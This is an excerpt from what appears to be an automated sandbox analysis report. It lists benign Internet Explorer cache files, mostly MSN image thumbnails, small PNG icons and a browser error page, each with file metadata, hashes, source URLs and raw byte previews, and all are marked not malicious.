                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8RRR.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......w.&.Un.k.^Y...B3.Fi...>.R[..O..e.lP.l....d].^g..WK9.;c'.h...SO.i#l..E(.....n..X....8...Z....}j....^u........3..l.....i..}.Q.M..'.B.0E2.-b.'..0..3.z.zRc..JU.Fs...sL...V..~....-..T..N.......N..uAm.....0g..O...WG484......H.*.8..B. U.;I.....s@#KH..x.wM.+...k[@l.h.<*>P.........I-.Kqr"..Md..7Z-Iu+.H.S.EbF..7.>.b.9.N...%G.W^.r.s.|.S.......O1#.t......g...a.]
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1b8YuS[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):11312
                                                                                                                                                                                                                      Entropy (8bit):7.948344433535912
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BCWLsQlHQ70Wu9DtQz15YYX3EZmHcZ4hGrWIaPV4mSGhcrUzA8W5Sw:kWRw7WY0YXxcZmGr8N7S+vK5Sw
                                                                                                                                                                                                                      MD5:027BD59E067DC79D800CB2DED5F109F9
                                                                                                                                                                                                                      SHA1:4A29466490280517367C8F0EABDE1EBD3AC0CC86
                                                                                                                                                                                                                      SHA-256:FAC6CC076D9168ABB548499A8F6E13E9C28D1F83CF4DE359282F79F95740BE66
                                                                                                                                                                                                                      SHA-512:4ACFE00AE09997AFEDA79DB965845723387DAABDF34E0281B1B0C0F66CE567E2F51D177A71E750B26DE2D4809769FAFC8B895FE2F6929DC2424AB6AC0540651A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8YuS.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=204&y=58
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..|...4.G.*.*B.pT...#y..`. ..6.....p!^.z....I-.Y..;...;!`.u<.X.b7...l...`j. ..h.Y...[.x$L.TJ.}..5dfRV......Qi`......5..j..,.ks.v.;nzV^..BcX$.g$.J.T.dgS.#...>..c0.#.<...?...S[...5..nuc%z....`..e......"...i]..T....F....Y.W;.x.......@...`.O.*[..i........6...R`..9.X.`A.8..sDr.Ad....ww-..'aP...0:.|..!.>.,..X...Z9.).)9.....DC....j./...C..Q.oX..v9.]V>7n.9.=
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1b8dsK[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):5121
                                                                                                                                                                                                                      Entropy (8bit):7.831731618809888
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:BGEE9g02BMSmpAmQWJFVI50CJHtbtg59hAZm+fGeAhuK1rYxEa:BFxBtAAhUFsY59AfGhd1rYv
                                                                                                                                                                                                                      MD5:3FAA603109A8F551DC918D68E3F423E6
                                                                                                                                                                                                                      SHA1:036F0C5115B35557872E490EBED3C3DF0B9E3A80
                                                                                                                                                                                                                      SHA-256:F81807C9B2233D6BEC625FDFD144DA5ACC154D7BFFF352F0F910C580907ED474
                                                                                                                                                                                                                      SHA-512:2AC7FFFF78DF86038AA9BDAA1EA6794C165343C7B74F0951715D9B8502420D4D953ADA5A511E573F2CED6AAC3BABB033F9F6E1A5947F19E5FEF39888B1B04EFC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8dsK.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..i)i.)h...Z(....(...Z.%..P.E.P.E.P.QKE......RR.@.E.P.W?.j.6z..j.4...O?...*)y..Af>.rk....n....X}.o..ZR..5....K....'..3d....;..~.1.A...B5.Q%fi.t....9..-!.IQ..........#...z..(.))i(.))i..!..q...CE.P..ZJZ.ZZJZ.)i)h.QE-..QE..QE..QE .(...(...(....ZJ.))h..n.Gn....@=.k....../.Q..q%...HWk{.....f..tEv.<..Ej.>^k.....Y..i."..v3..5j.....8.....6.ZJ.JJZ(....P!...I@..4.J...P
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1b8gtn[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):18112
                                                                                                                                                                                                                      Entropy (8bit):7.95012645602085
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:e49vSDEucHzuppFh9EiDs7BuiTzOfFx29rbEI:e49qDlOCppVE2WBu4Z
                                                                                                                                                                                                                      MD5:BC30EF5DBBEBFC3AA07CC931C7AC58EF
                                                                                                                                                                                                                      SHA1:7CB951C21E8EBCA6E9E43349C51D7A50F4323300
                                                                                                                                                                                                                      SHA-256:0D84A1B009DF22E44B5EFCBF4E9B849086BA4DCB5C61CB94DD396A3561376DD5
                                                                                                                                                                                                                      SHA-512:6AC3C2A91202D301333CF94AE7892BB2A6C30838D9CEDADC343DD12C30465A8283286E06D0C14BF7264A32D008AC13CAC655FC574487DD0B44D3E45F1F764902
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8gtn.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....4.nv..l;RyE;...G.)I!f.9.......4...X...K...V..i.n...b.....jY-...F&S.P...@5"]...@......J..ea..V@.... ...I%N.qJ.4...a.*egp>d>.BH......b.H=).`.....8+H..*s@.......|.W.#..H........j. .*....(.\v!d.Q.`pj..L1.(.X.<..".......,..R.z.4NA..M..R......T...e.L.....D..Sya....c&I%=.U....+q.SU&. N...RD..'*.If.i......"BO...cc..2....#.......JdAT..>..H.4.O.8.........
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1b8mnt[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):9593
                                                                                                                                                                                                                      Entropy (8bit):7.946866115862065
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BF4hVUxiRQMc7grsKbDjMZuPuwSq2/YQcUqrriwtKOLS8xFUx:vYVUxi+MgEs+QuxSZ3RWrHtKOLrEx
                                                                                                                                                                                                                      MD5:E07660053F1FC1E954983B9954978AA9
                                                                                                                                                                                                                      SHA1:30B8E2230633FB97B9DD2C162E341144A3A154C8
                                                                                                                                                                                                                      SHA-256:B78EF92221122F933BA9238775D178187E75E3E0746544BC9E26C39E6FEDB7A1
                                                                                                                                                                                                                      SHA-512:FABD6C10BDF4CC026A338AEF12509D8EA5CD9AA72C35A5BD4083431CBC2F93671605734FC64D4F31E3756EBAB3351ECF236F769CA9D0F42A2DE8572071A38A8F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b8mnt.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....w7\.j.EK......X~s..Nja.....#gRE.+.......9Ufv..3..{..i.>O..Ol../..k....Mf.D.[[3.=."..Bj..H&....R...K.......*........sE7...<`u....F$M..T.C\a.....QWM.Xq.N.7...M.....N;...9...1.....%~...].q.A.. &8.f$r{...(....L+p%d ...n0.I8$..0h.#H....u.....C......:.........Et.<...+._.F).A3.d].ksE..e9..*.Xa.."..x..5..DGFz%.%..9..x.7.w\.....WU...&..sz.+.].3...J...I]..
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB5zDwX[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):704
                                                                                                                                                                                                                      Entropy (8bit):7.504963021970784
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/78/kFf6XyxG0K8VW5npVrgzBpeIZv5C2jcmQ2T3SmAiARgJ5:3+BK8VW5b8NpeIZRXImQ7iACv
                                                                                                                                                                                                                      MD5:C7DBA01C92D1B9060E51F056B26122BC
                                                                                                                                                                                                                      SHA1:440F7FC2EE80D3A74076C6709219F29A31893F86
                                                                                                                                                                                                                      SHA-256:156AE4B3A7EF2591982271E4287B174CDC4C0EE612060AD23E5469ED1148D977
                                                                                                                                                                                                                      SHA-512:95EF6D3FA8050C25CA83DCFFA8F7D9647C71A60EEEC81A10AE5820EB52D65C009A7699A4A581BAE5254685AA391404DFB3206EDAEDCBC38D7F0083D0F5DD8FC7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB5zDwX.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....UIDAT8O.._HSa....6WQXZ..&Dta2........*......!x.D..$..Vb..0...H*........n...?.{.v.!.X....;...|..x.q....&...q....Z.?&hmi.@w'...*.h....=..n.Y.\.Y..Kg..h9.<.5.V..:y.....:....BA:w...t....%..q....2.......k.gS..W}Ts...6_3....[..T......;.j.].XO.D\7...A=O.j/PF.we.(...K.1@.5........@...1YJ.g...U..c/..(...:..3`[.X..H........*...a..@Pe...n.z....05.... .C0Y ...Ly.H............_!...... ..F(..ES%f...........1.......0.....?.+Q...yN..*K.L0....M!.H..e.I.ct|....f.U... l..7!.J.a.O.....X.UG..RS`..;..p...6H...).t*....[.n.w..Z`..^>j..J.....d=...B...Q....D<.5........$..x.$.l%F..D#A....S....A ....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB6Ma4a[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):396
                                                                                                                                                                                                                      Entropy (8bit):6.789155851158018
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
                                                                                                                                                                                                                      MD5:6D4A6F49A9B752ED252A81E201B7DB38
                                                                                                                                                                                                                      SHA1:765E36638581717C254DB61456060B5A3103863A
                                                                                                                                                                                                                      SHA-256:500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
                                                                                                                                                                                                                      SHA-512:34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc|. ..?...|.UA....GP.*`|. ......E...b.....&.>..*x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7gRE[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):482
                                                                                                                                                                                                                      Entropy (8bit):7.256101581196474
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
                                                                                                                                                                                                                      MD5:307888C0F03ED874ED5C1D0988888311
                                                                                                                                                                                                                      SHA1:D6FB271D70665455A0928A93D2ABD9D9C0F4E309
                                                                                                                                                                                                                      SHA-256:D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
                                                                                                                                                                                                                      SHA-512:6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.*3. .!..p..,.c.>.\<H.0.*...,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7hg4[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):458
                                                                                                                                                                                                                      Entropy (8bit):7.172312008412332
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
                                                                                                                                                                                                                      MD5:A4F438CAD14E0E2CA9EEC23174BBD16A
                                                                                                                                                                                                                      SHA1:41FC65053363E0EEE16DD286C60BEDE6698D96B3
                                                                                                                                                                                                                      SHA-256:9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
                                                                                                                                                                                                                      SHA-512:FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..*$Mf..j.*n.*~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T.*.Z_..'.}..rc....(...9V.&.....|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBVuddh[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):304
                                                                                                                                                                                                                      Entropy (8bit):6.758580075536471
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
                                                                                                                                                                                                                      MD5:245557014352A5F957F8BFDA87A3E966
                                                                                                                                                                                                                      SHA1:9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
                                                                                                                                                                                                                      SHA-256:0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
                                                                                                                                                                                                                      SHA-512:686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.|?.....r.\-Ca......IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBXXVfm[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):823
                                                                                                                                                                                                                      Entropy (8bit):7.627857860653524
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:U/6IPdppmpWEL+O4TCagyP79AyECQdYTVc6ozvqE435/kc:U/6Ilpa4T/0IVKdI1
                                                                                                                                                                                                                      MD5:C457956A3F2070F422DD1CC883FB4DFB
                                                                                                                                                                                                                      SHA1:67658594284D733BB3EE7951FE3D6EE6EB39C8E2
                                                                                                                                                                                                                      SHA-256:90E75C3A88CD566D8C3A39169B1370BBE5509BCBF8270AF73DB9F373C145C897
                                                                                                                                                                                                                      SHA-512:FE9D1C3F20291DFB59B0CEF343453E288394C63EF1BE4FF2E12F3F9F2C871452677B8346604E3C15A241F11CC7FEB0B91A2F3C9A2A67E446A5B4A37D331BCEA3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBXXVfm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.SKH.a....g.....E..j..B7..B..... .L)q.&t..\EA. A.. D.. 7..M.(#A.t|&..z.3w.....Zu.;s.9.;................i.o.P.:....D.+...!.....4.g.J..W..F.mC..%tt0I.j..J..kU.o.*..0.....qk4....!>.>...;...Q..".5$..oaX..>..:..Ebl..;.{s...W.v..#k}].)}......U.'....R..(..4..n..dp......v.@!..^G0....A..j.}..h+..t.....<..q...6.*8.jG......E%...F.......ZT....+....-.R.....M.. .A.wM........+.F}.....`-+u....yf..h,.KB.0......;I.'..E.(...2VR;.V*...u...cM..}....r\.!.J>%......8f"....q.|...i..8..I1..f.3p.@ $a.k.A...3..I.O.Dj...}..PY.5`...$..y.Z..t... ...|.E.zp............>f..<*z.If...9Z;....O.^B.Q..-.C....=.......v?@).Q..b...3....`.9d.D5.......X.....Za.......!#h*.. \&s....M3Qa..%.p..\1..xE.>..-J.._........?..?*5e......IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBnYSFZ[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                      Entropy (8bit):7.425950711006173
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
                                                                                                                                                                                                                      MD5:CA188779452FF7790C6D312829EEE284
                                                                                                                                                                                                                      SHA1:076DF7DE6D49A434BBCB5D88B88468255A739F53
                                                                                                                                                                                                                      SHA-256:D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
                                                                                                                                                                                                                      SHA-512:2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....*u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..|>..n4...2.57.*.......f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\dnserror[1]
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):2997
                                                                                                                                                                                                                      Entropy (8bit):4.4885437940628465
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                                                      MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                                                      SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                                                      SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                                                      SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
                                                                                                                                                                                                                      Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1]
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):12105
                                                                                                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
